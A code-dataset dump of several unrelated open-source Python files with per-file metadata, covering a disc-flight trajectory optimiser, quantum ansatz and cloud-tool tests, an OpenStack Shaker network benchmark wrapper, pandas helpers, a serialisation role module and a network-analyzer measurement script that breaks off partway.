| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4cffed78f06b24cc3c09215a327c208310e601
| 1,634
|
py
|
Python
|
research/tunnel.py
|
carrino/FrisPy
|
db9e59f465ee25d1c037d580c37da8f35b930b50
|
[
"MIT"
] | null | null | null |
research/tunnel.py
|
carrino/FrisPy
|
db9e59f465ee25d1c037d580c37da8f35b930b50
|
[
"MIT"
] | null | null | null |
research/tunnel.py
|
carrino/FrisPy
|
db9e59f465ee25d1c037d580c37da8f35b930b50
|
[
"MIT"
] | null | null | null |
import math
from pprint import pprint
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from frispy import Disc
from frispy import Discs
from frispy import Model
model = Discs.roc
mph_to_mps = 0.44704
v = 56 * mph_to_mps
rot = -v / model.diameter
ceiling = 4 # 4 meter ceiling
tunnel_width = 4 # 4 meter wide tunnel
def distance(x):
a, nose_up, hyzer = x
d = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
r = d.compute_trajectory(15.0, **{"max_step": .2})
rx = r.x[-1]
ry = abs(r.y[-1])
overCelingIndex = next(filter(lambda i: r.z[i] > ceiling, range(len(r.z))), None)
if overCelingIndex is not None:
return -r.x[overCelingIndex]
outsideTunnelIndex = next(filter(lambda i: math.fabs(r.y[i]) > tunnel_width / 2, range(len(r.z))), None)
if outsideTunnelIndex is not None:
return -r.x[outsideTunnelIndex]
return -rx + ry / (rx + ry)
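# Editor's note (sketch of the objective above): the optimiser maximises the
# downrange distance rx (by minimising -rx) with a small penalty for lateral
# drift ry; a throw is scored only up to the first point where it rises above
# the 4 m ceiling or drifts outside the 4 m wide tunnel.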
bnds = [(-90, 90)] * 3
x0 = [6, -3, 10]
res = minimize(distance, x0, method='powell', bounds=bnds, options={'xtol': 1e-8, 'disp': True})
pprint(res)
a, nose_up, hyzer = res.x
disc = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
result = disc.compute_trajectory(15.0, **{"max_step": .2})
times = result.times
t, x, y, z = result.times, result.x, result.y, result.z
#plt.plot(x, y)
#plt.plot(x, z)
#plt.plot(t, x)
plt.plot(t, y)
plt.plot(t, z)
pprint(x[-1] * 3.28084) # feet
plt.show()
| 27.694915
| 113
| 0.621787
| 274
| 1,634
| 3.649635
| 0.350365
| 0.036
| 0.044
| 0.04
| 0.282
| 0.282
| 0.216
| 0.16
| 0.16
| 0.16
| 0
| 0.04234
| 0.205018
| 1,634
| 58
| 114
| 28.172414
| 0.727483
| 0.050184
| 0
| 0.04878
| 0
| 0
| 0.047896
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.170732
| 0
| 0.268293
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4e0e23c7947f7d713c88797190743b2b4ea285
| 1,450
|
py
|
Python
|
openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py
|
unpilbaek/OpenFermion-Cirq
|
d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d
|
[
"Apache-2.0"
] | 278
|
2018-07-18T23:43:16.000Z
|
2022-01-02T21:38:08.000Z
|
openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py
|
unpilbaek/OpenFermion-Cirq
|
d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d
|
[
"Apache-2.0"
] | 131
|
2018-07-18T19:04:58.000Z
|
2020-08-04T21:05:42.000Z
|
openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py
|
unpilbaek/OpenFermion-Cirq
|
d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d
|
[
"Apache-2.0"
] | 101
|
2018-07-18T21:43:50.000Z
|
2022-03-04T09:51:02.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz
def test_swap_network_trotter_hubbard_ansatz_param_bounds():
ansatz = SwapNetworkTrotterHubbardAnsatz(3, 1, 1.0, 4.0, periodic=False)
assert list(symbol.name for symbol in ansatz.params()) == [
'Th_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-1.0, 1.0)]
ansatz = SwapNetworkTrotterHubbardAnsatz(1, 4, 1.0, 4.0, periodic=False)
assert list(symbol.name for symbol in ansatz.params()) == [
'Tv_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-1.0, 1.0)]
ansatz = SwapNetworkTrotterHubbardAnsatz(3, 2, 1.0, 4.0)
assert list(symbol.name for symbol in ansatz.params()) == [
'Th_0', 'Tv_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-2.0, 2.0), (-1.0, 1.0)]
| 41.428571
| 80
| 0.65931
| 210
| 1,450
| 4.471429
| 0.414286
| 0.021299
| 0.019169
| 0.021299
| 0.374867
| 0.374867
| 0.374867
| 0.374867
| 0.366347
| 0.366347
| 0
| 0.049912
| 0.212414
| 1,450
| 34
| 81
| 42.647059
| 0.772329
| 0.370345
| 0
| 0.470588
| 0
| 0
| 0.027809
| 0
| 0
| 0
| 0
| 0
| 0.352941
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe52100e092cba8f28b9f872d87740877e78ee29
| 5,535
|
py
|
Python
|
functest/opnfv_tests/openstack/shaker/shaker.py
|
opnfv-poc/functest
|
4f54b282cabccef2a53e21c77c81b60fe890a8a4
|
[
"Apache-2.0"
] | null | null | null |
functest/opnfv_tests/openstack/shaker/shaker.py
|
opnfv-poc/functest
|
4f54b282cabccef2a53e21c77c81b60fe890a8a4
|
[
"Apache-2.0"
] | null | null | null |
functest/opnfv_tests/openstack/shaker/shaker.py
|
opnfv-poc/functest
|
4f54b282cabccef2a53e21c77c81b60fe890a8a4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2018 Orange and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
"""
Shaker_ wraps around popular system network testing tools like iperf, iperf3
and netperf (with help of flent). Shaker is able to deploy OpenStack instances
and networks in different topologies. Shaker scenario specifies the deployment
and list of tests to execute.
.. _Shaker: http://pyshaker.readthedocs.io/en/latest/
"""
import logging
import os
import json
import scp
from functest.core import singlevm
from functest.utils import env
class Shaker(singlevm.SingleVm2):
"""Run shaker full+perf l2 and l3"""
# pylint: disable=too-many-instance-attributes
__logger = logging.getLogger(__name__)
filename = '/home/opnfv/functest/images/shaker-image-1.3.0+stretch.qcow2'
flavor_ram = 512
flavor_vcpus = 1
flavor_disk = 3
username = 'debian'
port = 9000
ssh_connect_loops = 12
create_server_timeout = 300
shaker_timeout = '3600'
quota_instances = -1
quota_cores = -1
def __init__(self, **kwargs):
super(Shaker, self).__init__(**kwargs)
self.role = None
def check_requirements(self):
if self.count_hypervisors() < 2:
self.__logger.warning("Shaker requires at least 2 hypervisors")
self.is_skipped = True
self.project.clean()
def prepare(self):
super(Shaker, self).prepare()
self.cloud.create_security_group_rule(
self.sec.id, port_range_min=self.port, port_range_max=self.port,
protocol='tcp', direction='ingress')
def execute(self):
"""
Returns:
- 0 if success
- 1 on operation error
"""
assert self.ssh
endpoint = self.get_public_auth_url(self.orig_cloud)
self.__logger.debug("keystone endpoint: %s", endpoint)
if self.orig_cloud.get_role("admin"):
role_name = "admin"
elif self.orig_cloud.get_role("Admin"):
role_name = "Admin"
else:
raise Exception("Cannot detect neither admin nor Admin")
self.orig_cloud.grant_role(
role_name, user=self.project.user.id,
project=self.project.project.id,
domain=self.project.domain.id)
if not self.orig_cloud.get_role("heat_stack_owner"):
self.role = self.orig_cloud.create_role("heat_stack_owner")
self.orig_cloud.grant_role(
"heat_stack_owner", user=self.project.user.id,
project=self.project.project.id,
domain=self.project.domain.id)
self.orig_cloud.set_compute_quotas(
self.project.project.name,
instances=self.quota_instances,
cores=self.quota_cores)
scpc = scp.SCPClient(self.ssh.get_transport())
scpc.put('/home/opnfv/functest/conf/env_file', remote_path='~/')
if os.environ.get('OS_CACERT'):
scpc.put(os.environ.get('OS_CACERT'), remote_path='~/os_cacert')
(_, stdout, stderr) = self.ssh.exec_command(
'source ~/env_file && '
'export OS_INTERFACE=public && '
'export OS_AUTH_URL={} && '
'export OS_USERNAME={} && '
'export OS_PROJECT_NAME={} && '
'export OS_PROJECT_ID={} && '
'unset OS_TENANT_NAME && '
'unset OS_TENANT_ID && '
'unset OS_ENDPOINT_TYPE && '
'export OS_PASSWORD="{}" && '
'{}'
'env && '
'timeout {} shaker --debug --image-name {} --flavor-name {} '
'--server-endpoint {}:9000 --external-net {} --dns-nameservers {} '
'--scenario openstack/full_l2,'
'openstack/full_l3_east_west,'
'openstack/full_l3_north_south,'
'openstack/perf_l3_north_south '
'--report report.html --output report.json'.format(
endpoint, self.project.user.name, self.project.project.name,
self.project.project.id, self.project.password,
'export OS_CACERT=~/os_cacert && ' if os.environ.get(
'OS_CACERT') else '',
self.shaker_timeout, self.image.name, self.flavor.name,
self.fip.floating_ip_address, self.ext_net.id,
env.get('NAMESERVER')))
self.__logger.info("output:\n%s", stdout.read().decode("utf-8"))
self.__logger.info("error:\n%s", stderr.read().decode("utf-8"))
if not os.path.exists(self.res_dir):
os.makedirs(self.res_dir)
try:
scpc.get('report.json', self.res_dir)
scpc.get('report.html', self.res_dir)
except scp.SCPException:
self.__logger.exception("cannot get report files")
return 1
with open(os.path.join(self.res_dir, 'report.json')) as json_file:
data = json.load(json_file)
for value in data["records"].values():
if value["status"] != "ok":
self.__logger.error(
"%s failed\n%s", value["scenario"], value["stderr"])
return 1
return stdout.channel.recv_exit_status()
def clean(self):
super(Shaker, self).clean()
if self.role:
self.orig_cloud.delete_role(self.role.id)
| 37.910959
| 79
| 0.605239
| 679
| 5,535
| 4.740795
| 0.39028
| 0.041007
| 0.036347
| 0.014911
| 0.131718
| 0.082634
| 0.068966
| 0.068966
| 0.068966
| 0.045356
| 0
| 0.012935
| 0.273713
| 5,535
| 145
| 80
| 38.172414
| 0.787811
| 0.134417
| 0
| 0.073395
| 0
| 0.009174
| 0.218935
| 0.042688
| 0
| 0
| 0
| 0
| 0.009174
| 1
| 0.045872
| false
| 0.018349
| 0.055046
| 0
| 0.247706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5674a5616780733e828478139977dd1166a1db
| 2,288
|
py
|
Python
|
library/pandas_utils.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | 5
|
2021-01-14T03:34:42.000Z
|
2022-03-07T15:34:18.000Z
|
library/pandas_utils.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | 551
|
2020-10-19T00:02:38.000Z
|
2022-03-30T02:18:22.000Z
|
library/pandas_utils.py
|
SACGF/variantgrid
|
515195e2f03a0da3a3e5f2919d8e0431babfd9c9
|
[
"RSA-MD"
] | null | null | null |
import os
import sys
import numpy as np
import pandas as pd
def get_columns_percent_dataframe(df: pd.DataFrame, totals_column=None, percent_names=True) -> pd.DataFrame:
""" @param totals_column: (default = use sum of columns)
@param percent_names: Rename names from 'col' => 'col %'
Return a dataframe as a percentage of totals_column if provided, or sum of columns """
percent_df = pd.DataFrame(index=df.index)
columns = df.columns
if totals_column:
totals_series = df[totals_column]
columns = columns.difference([totals_column])  # Index does not support '-' with a list in modern pandas
else:
totals_series = df.sum(axis=1)
for col in columns:
new_col = col
if percent_names:
new_col = f"{new_col} %"
multiplier = 100.0 # to get percent
percent_df[new_col] = multiplier * df[col] / totals_series
return percent_df
def get_rows_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
row_sums = df.sum(axis=0)
return df.multiply(100.0) / row_sums
def get_total_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
total = df.sum(axis=0).sum()
return df.multiply(100.0) / total
def df_handle_below_minimum_floats(df: pd.DataFrame) -> pd.DataFrame:
def handle_if_below_min(series):
if series.dtype == 'd':
too_small_mask = abs(series) < sys.float_info.min
series[too_small_mask] = sys.float_info.min
return series
return df.apply(handle_if_below_min, axis=0)
def nan_to_none(val):
if np.isnan(val):
val = None
return val
def df_nan_to_none(df: pd.DataFrame) -> pd.DataFrame:
return df.where((pd.notnull(df)), None)
def df_replace_nan(df: pd.DataFrame, nan_replace='') -> pd.DataFrame:
return df.where((pd.notnull(df)), nan_replace)
def read_csv_skip_header(fle, header='#', **kwargs) -> pd.DataFrame:
if os.stat(fle).st_size == 0:
raise ValueError("File is empty")
with open(fle) as f:
pos = 0
cur_line = f.readline()
while cur_line.startswith(header):
pos = f.tell()
cur_line = f.readline()
f.seek(pos)
return pd.read_csv(f, **kwargs)
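A minimal usage sketch for the helpers above (not part of the original file): the import path mirrors the file location library/pandas_utils.py, and the sample DataFrame is invented for illustration.
import pandas as pd
from library.pandas_utils import get_columns_percent_dataframe, df_replace_nan
# Two runs with pass/fail counts; convert each column to a percentage of the row total.
counts = pd.DataFrame({'pass': [8, 3], 'fail': [2, 1]}, index=['run_a', 'run_b'])
percent = get_columns_percent_dataframe(counts)   # columns become 'pass %' and 'fail %'
print(percent)
cleaned = df_replace_nan(percent, nan_replace=0)  # any NaN cells are replaced with 0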
| 28.6
| 108
| 0.649913
| 338
| 2,288
| 4.213018
| 0.281065
| 0.108146
| 0.063904
| 0.042135
| 0.257725
| 0.192416
| 0.183287
| 0.161517
| 0.11236
| 0.11236
| 0
| 0.010315
| 0.237325
| 2,288
| 79
| 109
| 28.962025
| 0.805731
| 0.137675
| 0
| 0.039216
| 0
| 0
| 0.013361
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.078431
| 0.039216
| 0.431373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5794e6af44c9c1406d19b02f67dd498db59356
| 2,676
|
py
|
Python
|
create/create_args_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
create/create_args_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
create/create_args_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for create."""
import unittest
from unittest import mock
from acloud import errors
from acloud.create import create_args
from acloud.internal import constants
from acloud.internal.lib import driver_test_lib
def _CreateArgs():
"""set default pass in arguments."""
mock_args = mock.MagicMock(
flavor=None,
num=1,
adb_port=None,
hw_property=None,
stable_cheeps_host_image_name=None,
stable_cheeps_host_image_project=None,
username=None,
password=None,
cheeps_betty_image=None,
local_image=None,
local_kernel_image=None,
local_system_image=None,
system_branch=None,
system_build_id=None,
system_build_target=None,
local_instance=None,
remote_host=None,
host_user=constants.GCE_USER,
host_ssh_private_key_path=None,
avd_type=constants.TYPE_CF,
autoconnect=constants.INS_KEY_VNC)
return mock_args
# pylint: disable=invalid-name,protected-access
class CreateArgsTest(driver_test_lib.BaseDriverTest):
"""Test create_args functions."""
def testVerifyArgs(self):
"""test VerifyArgs."""
mock_args = _CreateArgs()
# Test args default setting shouldn't raise error.
self.assertEqual(None, create_args.VerifyArgs(mock_args))
def testVerifyArgs_ConnectWebRTC(self):
"""test VerifyArgs args.autconnect webrtc.
WebRTC only apply to remote cuttlefish instance
"""
mock_args = _CreateArgs()
mock_args.autoconnect = constants.INS_KEY_WEBRTC
# Test remote instance and avd_type cuttlefish(default)
# Test args.autoconnect webrtc shouldn't raise error.
self.assertEqual(None, create_args.VerifyArgs(mock_args))
# Test pass in none-cuttlefish avd_type should raise error.
mock_args.avd_type = constants.TYPE_GF
self.assertRaises(errors.UnsupportedCreateArgs,
create_args.VerifyArgs, mock_args)
if __name__ == "__main__":
unittest.main()
| 32.240964
| 74
| 0.702167
| 339
| 2,676
| 5.336283
| 0.454277
| 0.039801
| 0.039801
| 0.039801
| 0.114981
| 0.071863
| 0.071863
| 0.071863
| 0.071863
| 0.071863
| 0
| 0.004331
| 0.223468
| 2,676
| 82
| 75
| 32.634146
| 0.866218
| 0.37855
| 0
| 0.093023
| 0
| 0
| 0.004994
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 1
| 0.069767
| false
| 0.023256
| 0.139535
| 0
| 0.255814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe57a342e2e561171bed3dec28d69a69629da501
| 452
|
py
|
Python
|
setup.py
|
Kannuki-san/msman
|
adc275ad0508d65753c8424e7f6b94becee0b855
|
[
"MIT"
] | null | null | null |
setup.py
|
Kannuki-san/msman
|
adc275ad0508d65753c8424e7f6b94becee0b855
|
[
"MIT"
] | null | null | null |
setup.py
|
Kannuki-san/msman
|
adc275ad0508d65753c8424e7f6b94becee0b855
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from cx_Freeze import setup,Executable
icondata='icon.ico'
base = None
# enable the GUI and disable the console (CUI) window
if sys.platform == 'win32' : base = 'win32GUI'
exe = Executable(script = 'main.py',
base = base,
#icon=icondata
)
setup(name = 'MSman',
version = '0.1',
description = 'Minecraft Server Manager',
executables = [exe]
)
| 17.384615
| 47
| 0.550885
| 52
| 452
| 4.769231
| 0.807692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022436
| 0.309735
| 452
| 26
| 48
| 17.384615
| 0.772436
| 0.163717
| 0
| 0
| 0
| 0
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe57f5cf47823b7ec7c95916bb4e6edc61679b1b
| 2,903
|
py
|
Python
|
stereotype/roles.py
|
petee-d/stereotype
|
33a2efc826fd907bd23ffb4e8f7cba119ff022ce
|
[
"MIT"
] | 6
|
2021-05-26T10:45:50.000Z
|
2022-01-31T17:36:10.000Z
|
stereotype/roles.py
|
petee-d/stereotype
|
33a2efc826fd907bd23ffb4e8f7cba119ff022ce
|
[
"MIT"
] | null | null | null |
stereotype/roles.py
|
petee-d/stereotype
|
33a2efc826fd907bd23ffb4e8f7cba119ff022ce
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from threading import Lock
from typing import List, Set, Optional, Any, Tuple
from stereotype.utils import ConfigurationError
class Role:
__slots__ = ('code', 'name', 'empty_by_default')
def __init__(self, name: str, empty_by_default: bool = False):
self.name = name
self.empty_by_default = empty_by_default
with _roles_lock:
self.code = len(_roles)
_roles.append(self)
def __repr__(self):
return f'<Role {self.name}, empty_by_default={self.empty_by_default}, code={self.code}>'
def __hash__(self):
return self.code
def __eq__(self, other):
return type(self) == type(other) and self.code == other.code
def whitelist(self, *fields, override_parents: bool = False):
return RequestedRoleFields(self, fields, is_whitelist=True, override_parents=override_parents)
def blacklist(self, *fields, override_parents: bool = False):
return RequestedRoleFields(self, fields, is_whitelist=False, override_parents=override_parents)
_roles: List[Role] = []
_roles_lock = Lock()
DEFAULT_ROLE = Role('default')
class FinalizedRoleFields:
__slots__ = ('role', 'fields')
def __init__(self, role: Role, fields: Optional[Set[str]] = None):
self.role = role
self.fields = fields or set()
def update_requested(self, other: RequestedRoleFields, all_field_names: Set[str], field_names: Set[str]):
assert self.role == other.role
if other.override_parents:
initial = set() if other.is_whitelist else all_field_names
else:
initial = self.fields
if other.is_whitelist:
self.fields = initial | other.fields
else:
self.fields = (initial | field_names) - other.fields
class RequestedRoleFields:
__slots__ = ('role', 'fields', 'is_whitelist', 'override_parents')
def __init__(self, role: Role, fields, is_whitelist: bool, override_parents: bool):
self.fields, non_descriptors = self._collect_input_fields(fields)
if non_descriptors:
raise ConfigurationError(f'Role blacklist/whitelist needs member descriptors (e.g. cls.my_field), '
f'got {non_descriptors[0]!r}')
self.role = role
self.is_whitelist = is_whitelist
self.override_parents = override_parents
def _collect_input_fields(self, fields) -> Tuple[Set[str], List[Any]]:
field_names: Set[str] = set()
non_descriptors: List[Any] = []
for field in fields:
if type(field).__name__ == 'member_descriptor':
field_names.add(field.__name__)
elif isinstance(field, property):
field_names.add(field.fget.__name__)
else:
non_descriptors.append(field)
return field_names, non_descriptors
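A minimal usage sketch for the role API above (not part of the original file): the Config class is invented purely to supply member descriptors, which is what whitelist()/blacklist() expect.
class Config:
    __slots__ = ('host', 'port', 'secret')
PUBLIC = Role('public', empty_by_default=True)
# Expose only host and port to the 'public' role; 'secret' stays hidden.
requested = PUBLIC.whitelist(Config.host, Config.port)
finalized = FinalizedRoleFields(PUBLIC)
finalized.update_requested(requested,
                           all_field_names={'host', 'port', 'secret'},
                           field_names={'host', 'port', 'secret'})
print(finalized.fields)  # {'host', 'port'}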
| 34.975904
| 111
| 0.654151
| 344
| 2,903
| 5.18314
| 0.241279
| 0.092541
| 0.047112
| 0.050477
| 0.154795
| 0.117779
| 0.089736
| 0.089736
| 0.089736
| 0.089736
| 0
| 0.000456
| 0.244575
| 2,903
| 82
| 112
| 35.402439
| 0.812586
| 0
| 0
| 0.081967
| 0
| 0
| 0.093352
| 0.021702
| 0
| 0
| 0
| 0
| 0.016393
| 1
| 0.163934
| false
| 0
| 0.065574
| 0.081967
| 0.42623
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe59e0ae9caf8657811351b2ce6b7040c6d723dc
| 7,175
|
py
|
Python
|
WEB21-1-12/WEB2/power/zvl_test.py
|
coderdq/vuetest
|
28ea4f36e2c4e7e80d1ba1777ef312733ef84048
|
[
"MIT"
] | null | null | null |
WEB21-1-12/WEB2/power/zvl_test.py
|
coderdq/vuetest
|
28ea4f36e2c4e7e80d1ba1777ef312733ef84048
|
[
"MIT"
] | null | null | null |
WEB21-1-12/WEB2/power/zvl_test.py
|
coderdq/vuetest
|
28ea4f36e2c4e7e80d1ba1777ef312733ef84048
|
[
"MIT"
] | null | null | null |
# coding:utf-8
'''
Test items for the vector network analyzer, including gain, in-band ripple and VSWR.
At most 10 markers can be created on one trace.
'''
import os
import logging
from commoninterface.zvlbase import ZVLBase
logger = logging.getLogger('ghost')
class HandleZVL(object):
def __init__(self, ip, offset):
self.zvl = None
self.ip = ip
self.offset = float(offset)
def init_zvl(self, path):
logger.debug('init zvl')
self.zvl = ZVLBase()
self.zvl.init_inst(self.ip)
self.zvl.reset_zvl()
self.path = path  # path used to store screenshots
def close_zvl(self):
self.zvl.close_inst()
def set_edge(self, low_edge, up_edge):
'''
:param low_edge: float, in MHz
:param up_edge: float, in MHz
:return:
'''
try:
low = '{}MHz'.format(low_edge)
up = '{}MHz'.format(up_edge)
self.zvl.set_freq(low, up)
return True
except Exception as e:
logger.error('set_edge error {}'.format(e))
return False
def set_trace(self, tracen, form, means):
'''
:param tracen: int
:param form: str
:param means: str, one of 'S11', 'S12', 'S21', 'S22'
:return:
'''
try:
self.zvl.set_trace_form(tracen, form)
self.zvl.change_trace_meas(tracen, means)
if form == 'MLOG':
self.zvl.set_div_value(tracen, 10)
# zvl.set_ref_value(zvlhandler, tracen, -40)
return True
except Exception as e:
logger.error('set_trace error {}'.format(e))
return False
def read_markery(self, tracen, markern, x):
x_str = '{}MHz'.format(x)
self.zvl.set_trace_marker(tracen, markern, x_str)  # set the marker position
_, marker1y = self.zvl.query_marker(tracen, markern)
return marker1y
def read_max_marker(self, tracen, markern):
try:
self.zvl.create_max_marker(tracen, markern) # max marker
# create_max_marker(zvlhandler, tracen, markern + 1) # max marker
marker1x, marker1y = self.zvl.query_marker(tracen, markern)
return float(marker1x) / 1000000.0, marker1y
except Exception as e:
logger.error('get_max_loss error {}'.format(e))
return None
def get_ripple_in_bw(self, tracen, markern):
'''
In-band ripple
:return:
'''
try:
self.zvl.create_min_marker(tracen, markern) # min marker
self.zvl.create_max_marker(tracen, markern + 1) # max marker
_, marker1y = self.zvl.query_marker(tracen, markern)
_, marker2y = self.zvl.query_marker(tracen, markern + 1)
absy = abs(float(marker1y) - float(marker2y))
return absy
except Exception as e:
logger.error('get_ripple_in_bw error{}'.format(e))
return None
def get_gain(self, *args):
'''
Read the gain and in-band ripple.
S21, dB magnitude
:return: gain at the high, middle and low frequency points, plus in-band ripple
'''
logger.debug('zvl get gain')
high, mid, low = args  # high, middle and low frequency points
self.zvl.remove_allmarker(1)
self.set_edge(low, high)
tracen = 1
self.set_trace(tracen, 'MLOG', 'S21')
markern = 1
# read the gain at the high, middle and low points
high_markery = float(self.read_markery(tracen, markern, high))
markern += 1
mid_markery = float(self.read_markery(tracen, markern, mid))
markern += 1
low_markery = float(self.read_markery(tracen, markern, low))
# in-band ripple
markern += 1
ripple = self.get_ripple_in_bw(tracen, markern)  # absolute value
ret = [high_markery + self.offset, mid_markery + self.offset,
low_markery + self.offset, ripple]
ret2 = ['%.2f' % float(item) for item in ret]
return ret2
def get_vswr(self, *args):
'''
VSWR S11,SWR
:return:max markerx,max markery
'''
logger.debug('zvl get_vswr')
self.zvl.remove_allmarker(1)
high, mid, low, dl_ul, temp = args  # high, middle and low frequency points
tracen = 1
markern = 1
start = float(low) - 2.5
end = float(high) + 2.5
self.set_edge(start, end)
self.set_trace(tracen, 'SWR', 'S11')
marker = self.read_max_marker(tracen, markern)
# take a screenshot
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_{}_VSWR.PNG'.format(temp, dl_ul,end))
self.zvl.save_screenshot(r'c:\\Temp\\1.PNG', r'{}'.format(pngpath))
# mstr='@'.join([str(item) for item in marker])
marker2 = ['%.2f' % float(item) for item in marker]
return marker2
def get_gain_vs_freq(self, markerlist,dl_ul, temp):
'''
825~835MHz,870~880,890~915,935~960,1570.42~1585,
1710~1785,1805~1880,1920~1980,2110~2170,
2570~2620,1880~1915,2300~2400,2400~2483.5
Take three screenshots; each screenshot can hold at most 10 markers.
markerlist: list of frequency points (MHz)
:return:
'''
logger.debug('zvl get_gain_vs_freq')
self.zvl.remove_allmarker(1)
tracen = 1
markern = 1
self.set_trace(tracen, 'MLOG', 'S21')
markery_list = []  # gain at every marker point; note the offset must be added
try:
# first screenshot
self.set_edge(700, 1700)
marker_lst = markerlist[:10]
for marker in marker_lst:
mstr = '{}MHz'.format(marker)
self.zvl.set_trace_marker(tracen, markern, mstr)
_, marker1y = self.zvl.query_marker(tracen, markern) # str
markery_list.append(marker1y)
markern += 1
pngpath = os.path.join(os.path.dirname(self.path), '{}{}_gain_vs_freq_1.PNG'.format(temp,dl_ul))
